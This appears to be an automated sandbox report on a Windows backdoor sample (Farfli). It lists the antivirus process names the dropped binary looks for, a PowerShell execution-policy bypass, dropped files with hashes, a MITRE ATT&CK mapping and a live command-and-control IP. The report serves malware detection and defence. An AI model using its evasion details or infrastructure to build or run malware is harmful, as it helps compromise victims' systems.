Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_00404FAA KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00404FAA
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: kwpswnsserver.exeBinary or memory string: acs.exe
Source: kwpswnsserver.exeBinary or memory string: avcenter.exe
Source: kwpswnsserver.exeBinary or memory string: kxetray.exe
Source: kwpswnsserver.exeBinary or memory string: vsserv.exe
Source: kwpswnsserver.exeBinary or memory string: avp.exe
Source: kwpswnsserver.exeBinary or memory string: cfp.exe
Source: kwpswnsserver.exeBinary or memory string: KSafeTray.exe
Source: kwpswnsserver.exeBinary or memory string: 360Safe.exe
Source: kwpswnsserver.exeBinary or memory string: 360tray.exe
Source: kwpswnsserver.exeBinary or memory string: rtvscan.exe
Source: kwpswnsserver.exeBinary or memory string: TMBMSRV.exe
Source: kwpswnsserver.exeBinary or memory string: ashDisp.exe
Source: kwpswnsserver.exeBinary or memory string: 360Tray.exe
Source: kwpswnsserver.exeBinary or memory string: avgwdsvc.exe
Source: kwpswnsserver.exeBinary or memory string: AYAgent.aye
Source: kwpswnsserver.exeBinary or memory string: QUHLPSVC.EXE
Source: kwpswnsserver.exeBinary or memory string: RavMonD.exe
Source: kwpswnsserver.exeBinary or memory string: Mcshield.exe
Source: kwpswnsserver.exeBinary or memory string: K7TSecurity.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		1
Replication Through Removable Media		1
Windows Management Instrumentation		1
Scripting		1
DLL Side-Loading		1
Disable or Modify Tools		141
Input Capture		2
System Time Discovery		Remote Services11
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts11
Native API		1
DLL Side-Loading		1
Access Token Manipulation		1
Deobfuscate/Decode Files or Information		LSASS Memory11
Peripheral Device Discovery		Remote Desktop Protocol1
Screen Capture		2
Encrypted Channel		Exfiltration Over Bluetooth1
System Shutdown/Reboot
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter		Logon Script (Windows)222
Process Injection		2
Obfuscated Files or Information		Security Account Manager3
File and Directory Discovery		SMB/Windows Admin Shares141
Input Capture		1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
PowerShell		Login HookLogin Hook1
Software Packing		NTDS38
System Information Discovery		Distributed Component Object Model2
Clipboard Data		Protocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets141
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Masquerading		Cached Domain Credentials31
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry		DCSync4
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
Virtualization/Sandbox Evasion		Proc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Indicator Removal		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1581339 Sample: OdiHmn3pRK.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 67 Suricata IDS alerts for network traffic 2->67 69 Multi AV Scanner detection for dropped file 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 5 other signatures 2->73 9 OdiHmn3pRK.exe 10 2->9         started        process3 file4 51 C:\Users\Public\Bilite\linit-v4.1.6.exe, PE32 9->51 dropped 53 C:\Users\Public\Bilite\...\kwpswnsserver.exe, PE32 9->53 dropped 55 Microsoft.WindowsA...ntime.Bootstrap.dll, PE32 9->55 dropped 12 cmd.exe 1 9->12         started        process5 signatures6 75 Bypasses PowerShell execution policy 12->75 15 kwpswnsserver.exe 3 8 12->15         started        20 conhost.exe 12->20         started        process7 dnsIp8 57 118.107.44.219, 18852, 19091, 49786 BCPL-SGBGPNETGlobalASNSG Singapore 15->57 45 C:\Users\user\AppData\Local\Temp\backup.exe, PE32 15->45 dropped 47 C:\Users\user\AppData\Local\Temp\backup.dll, PE32 15->47 dropped 49 C:\Users\user\AppData\Local\updated.ps1, ASCII 15->49 dropped 59 Detected unpacking (creates a PE file in dynamic memory) 15->59 61 Found evasive API chain (may stop execution after checking mutex) 15->61 63 Contains functionality to inject threads in other processes 15->63 65 2 other signatures 15->65 22 cmd.exe 1 15->22         started        24 cmd.exe 1 15->24         started        26 cmd.exe 1 15->26         started        file9 signatures10 process11 process12 28 powershell.exe 1 23 22->28         started        31 conhost.exe 22->31         started        33 powershell.exe 39 24->33         started        35 conhost.exe 24->35         started        37 conhost.exe 26->37         started        39 tasklist.exe 1 26->39         started        41 timeout.exe 1 26->41         started        43 10 other processes 26->43 signatures13 77 Loading BitLocker PowerShell Module 33->77

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
OdiHmn3pRK.exe28%VirustotalBrowse
OdiHmn3pRK.exe61%ReversingLabsWin32.Backdoor.Farfli

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\Bilite\Axialis\Microsoft.WindowsAppRuntime.Bootstrap.dll65%ReversingLabsWin32.Backdoor.Farfli
C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe0%ReversingLabs
C:\Users\Public\Bilite\linit-v4.1.6.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\backup.dll65%ReversingLabsWin32.Backdoor.Farfli
C:\Users\user\AppData\Local\Temp\backup.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://go.microsoftMicrosoft.PowerShell.ODataAdapter.ps10%Avira URL Cloudsafe
http://go.microsoftM0%Avira URL Cloudsafe
http://line.naver.jp00%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000011.00000002.2589700314.0000000005985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://go.microsoftMicrosoft.PowerShell.ODataAdapter.ps1powershell.exe, 00000011.00000002.2594783781.0000000006F20000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://sectigo.com/CPS0OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://ocsp.sectigo.com0OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://line.naver.jp0OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000011.00000002.2583492661.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2583492661.0000000005017000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://terms.line.me/line_terms?lang=en=OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Iconpowershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://aka.ms/pscore6lBkqpowershell.exe, 00000011.00000002.2583492661.0000000004921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.0000000004891000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://terms.line.me/line_terms?lang=idOdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://terms.line.me/line_terms?lang=koOdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tOdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.micropowershell.exe, 00000012.00000002.2584243863.0000000007329000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yOdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://terms.line.me/line_terms?lang=enOdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://desktop.line-scdn.net/win/bin/real/installer/installer.jsonSoftwareOdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000011.00000002.2583492661.0000000004A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2583492661.0000000005017000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.00000000049E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.2589700314.0000000005985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2582407542.00000000058F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://terms.line.me/line_terms?lang=esOdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://terms.line.me/line_terms?lang=thOdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://go.microsoftMpowershell.exe, 00000011.00000002.2594783781.0000000006F20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://terms.line.me/line_terms?lang=jaOdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://terms.line.me/line_terms?lang=zh-HantOdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.2583492661.0000000004921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2581302475.0000000004891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                118.107.44.219
                                                                		unknownSingapore
                                                                		64050BCPL-SGBGPNETGlobalASNSGtrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1581339
                                                                Start date and time:2024-12-27 13:08:08 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 9m 36s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Run name:Run with higher sleep bypass
                                                                Number of analysed new started processes analysed:29
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:OdiHmn3pRK.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:11933d4b44331258739282e769ca4914.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@43/29@0/1
                                                                EGA Information:
                                                                • Successful, ratio: 50%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 127
                                                                • Number of non-executed functions: 273
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 2200 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 3020 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                No simulations

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                No context

                                                                Domains

                                                                No context

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                BCPL-SGBGPNETGlobalASNSGS1Rv3ioghk.exeGet hashmaliciousUnknownBrowse
                                                                • 118.107.44.112
                                                                WiezmDFd6L.exeGet hashmaliciousUnknownBrowse
                                                                • 134.122.155.90
                                                                armv7l.elfGet hashmaliciousUnknownBrowse
                                                                • 134.122.132.194
                                                                492c3445eddadc4b2c411a6eb79813339a0b3fc6d2d69.dllGet hashmaliciousUnknownBrowse
                                                                • 134.122.134.93
                                                                rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                • 202.95.11.110
                                                                3.elfGet hashmaliciousUnknownBrowse
                                                                • 137.220.247.57
                                                                MicrosoftEdgeUpdateSetup.exeGet hashmaliciousUnknownBrowse
                                                                • 134.122.134.93
                                                                SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                • 134.122.191.187
                                                                http://93287.mobiGet hashmaliciousUnknownBrowse
                                                                • 137.220.229.108
                                                                T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                                • 118.107.29.172

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\Public\Bilite\Axialis\IiViS

                                                                Download File
                                                                Process:C:\Users\user\Desktop\OdiHmn3pRK.exe
                                                                File Type:openssl enc'd data with salted password, base64 encoded
                                                                Category:dropped
                                                                Size (bytes):56
                                                                Entropy (8bit):4.854067815178066
                                                                Encrypted:false
                                                                SSDEEP:3:iqkdQkBhiBVoXGrY:ilVK/rY
                                                                MD5:EB6D2B5C9717D35BBC4857BBBB10A0EB
                                                                SHA1:09BE1DF6AC449BC9447EBDD9435D4F07B797F299
                                                                SHA-256:B78047999312677DDE213A7C6424CF8132BD41E167C6D4CA2BEADC39B8CD4F9C
                                                                SHA-512:36FF67C3643FCDA0A1BB54C31BBF03F95551546A1448E9C05745C8E5DCEC1B54C893CE26FE6CCAC586F24589F6C2CAB50E1BA2224225BD1BE90A814ECC6F94C1
                                                                Malicious:false
                                                                Preview:U2FsdGVkX19IuirF87UgYAbEVFkkLbiXFc9z85LW9X2xzFfr234rdQ==

                                                                C:\Users\Public\Bilite\Axialis\Microsoft.WindowsAppRuntime.Bootstrap.dll

                                                                Download File
                                                                Process:C:\Users\user\Desktop\OdiHmn3pRK.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2290456
                                                                Entropy (8bit):6.607149462612304
                                                                Encrypted:false
                                                                SSDEEP:49152:hyT6UzfP7fyC5fJVOWsL6FpGgxv4v9c2Ut3n1gp0pci3YKLjX:hK6UzfP73RVOWmMZxvwc2Ut3n6p0pciV
                                                                MD5:4A55B0873DAD6B4F9506589C6B341D4E
                                                                SHA1:5231E7DF7BE7C3B1C145BDF2BC8E5E23C8540898
                                                                SHA-256:DFBD06B0B2C121153B0DE4B809778CEA1A43E754E6D18B254BA8902902850CF4
                                                                SHA-512:297F0A3F2442A2C70BF5828C0C60B228D043F2BF80D9305FF6F2AE15328040F7B5634D36529E0CAC53E90F084208A630B2C8E8C0C5C70B4E9A130B8FB3895C0D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 65%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....cg...........!.........<......S .......................................`#...........@.................................3...h..... ..H............"..)... !..0.......................... b......p................................................text...}........................... ..`.rdata...^.......`..................@..@.data......... ..^..................@....00cfg........ ......L .............@..@.tls.......... ......N .............@....rsrc....H.... ..H...P .............@..@.reloc...0... !..2.... .............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\OdiHmn3pRK.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):315264
                                                                Entropy (8bit):6.663282350107098
                                                                Encrypted:false
                                                                SSDEEP:6144:rcaBfTrqYPy8brrIQYDW6AgoY7fJA3p+anDhDAOHlPzJD:rca48brrIQYDW6AgpAzjzJD
                                                                MD5:607336E586D1BD00DCF1CA7EED97A8DB
                                                                SHA1:1B10CCE801F12E277DEFD9D16FC3F4EEBCCE3344
                                                                SHA-256:A5DD0996B950D443A04F8589EAF7AEA16C9420D9B72D336F283F95DC74BFC79C
                                                                SHA-512:61A81D218090BDFAAADB6AA87C407984FDA14C62D98397817D9AAD1A0350E7C4E0A7FD884D71081EB15044CF0D06C1B9715C822DC50831A03D63EF66AEB2BEFA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........>.'._.t._.t._.t.4.u._.t.4.ug_.t.4.u._.t.*.u._.t.*.u._.t.*.u._.t.'ct._.t...u._.t.4.u._.t._.ti_.t.*.u._.t.*.t._.t._gt._.t.*.u._.tRich._.t........................PE..L....*.f..........................................@......................................@.............................................h............~...Q......D*......p...............................@............................................text............................... ..`.rdata..`...........................@..@.data...PF...0...6..................@....rsrc...h............L..............@..@.reloc..D*.......,...R..............@..B........................................................................................................................................................................................................................................................................

                                                                C:\Users\Public\Bilite\Axialis\xfmsbtqi.png

                                                                Download File
                                                                Process:C:\Users\user\Desktop\OdiHmn3pRK.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):34973764
                                                                Entropy (8bit):7.999992711795488
                                                                Encrypted:true
                                                                SSDEEP:786432:R6DiHlJlatIRi7EorzN+IE7IFlqmC0o5MqDZOTtWB2:wDiFJlaKR8ECsp8lCb5MqFOZX
                                                                MD5:5BE06E99845606C85E3BD3BEABF20C2B
                                                                SHA1:99BA32BA05FBA7A16F0A227F23C7C50EC9CB632B
                                                                SHA-256:9DC8C2877D20A8D70121CD33C3088DE63ADA7FB87E02CD11E21F7618C0AD617C
                                                                SHA-512:EE93B79EB45753DB5AFA0D003AF35E508C218F216EA146D8EC4609403519DFBD4B9A52DEC2F6F21A08F2FA03A02B34BA173019E64147AC5F14C3605B8069667E
                                                                Malicious:false
